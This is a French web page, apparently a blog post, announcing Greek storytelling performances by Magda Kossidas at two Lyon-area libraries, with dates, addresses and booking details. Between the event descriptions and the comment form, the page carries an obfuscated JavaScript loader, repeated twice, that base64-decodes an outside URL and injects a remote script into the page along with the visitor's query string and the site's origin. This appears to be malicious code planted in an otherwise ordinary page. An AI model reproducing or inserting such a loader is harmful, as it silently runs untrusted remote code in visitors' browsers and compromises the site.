Héraclès, la Récidive – Contes du monde

Nos chers amis et amies, Αγαπητοί μας φίλοι και φίλες,

Dans le cadre «Paroles en Festival», Contes du monde

Jeudi 22 mai à 20h

à la bibliothèque du 2éme

13, rue de Condé 69002 Lyon

entrées gratuites

Réservations impérativement au 04 78 62 74 90

Tout public à partir de 10 ans

La conteuse Magda Kossidas viendra pour nous raconter

Héraclès, la Récidive

Héraklès, fils d’un dieu et d’une mortelle possède une double nature, divine et humaine.Doté d’une force surhumaine, il accomplit avec vaillance un destin exceptionnel pour débarrasser terre et mer de toutes les monstruosités menaçant la vie.

Mais quand la Force est le seul recours, secours, confort et réconfort, elle devient vite piège, erreur et folie!

Héraklès nous raconte la lutte permanente entre force divine et faiblesse humaine pour nous apprendre que, de cette lutte inévitable, est né un jour l’être le plus sublime et le plus tragique de l’univers: le héros!

Mercredi 21 Mai à 10h30

à la bibliothèque des Genêts

10, rue Daligand 69500 Bron

Petits contes grecs

Il était une fois, il était un temps, deux bonnes voisines; chacune avait un fils. La première avait un enfant terrible, un vrai diable! Il ne faisait jamais rien comme tout le monde…

Trois histoires autour du thème de l’idiot, qui le plus souvent n’est pas celui qu’on imagine! Des histoires pour réfléchir, des histoires pour rire, des histoires à rire!

(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.